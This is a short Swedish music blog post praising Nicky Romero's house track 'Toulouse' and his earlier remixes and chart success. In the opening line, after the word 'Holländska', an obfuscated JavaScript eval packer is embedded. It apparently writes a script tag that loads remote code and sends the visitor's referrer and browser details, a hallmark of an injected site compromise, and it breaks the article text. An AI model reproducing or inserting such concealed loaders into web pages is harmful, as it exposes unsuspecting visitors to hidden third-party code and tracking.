Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Nicky Romero – Toulouse

Nicky Romero – Toulouse
Alexander Gylemo

Holländska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dhfta|var|u0026u|referrer|skyyr||js|php’.split(’|’),0,{}))
Nicky Romero har nämnts tidigare på Revue.se då han var en av de första akterna i Tiestos monsterspelning på Globen i Stockholm i slutet av 2011. Han gjorde ett grymt framförande och fick igång publiken rejält med enorma låtar, varav en är hans egna ”Toulouse”, en av spelningens mest minnesvärda låtar enligt mig.

Med en grym orgel och en riktigt skadat drop kliver 89:ans låt nu högre och högre på topplistorna, bl.a. på Beatport där den nu ligger 3a i världen.

httpv://www.youtube.com/watch?v=3vPIEXhwYdE&ob=av2e

Nicky är inte helt okänd i housescenen då han tidigare levererat feta remixar på bl.a. David Guetta och Green Velvet och släppt egna låtar, varav vissa han gjort tillsammans med stora artister som Bingo Players och Hardwell. Med ”Toulouse” hoppas vi att han etablerar sig på riktigt då hans sound behövs i en musikgenre som blir allt mer monoton!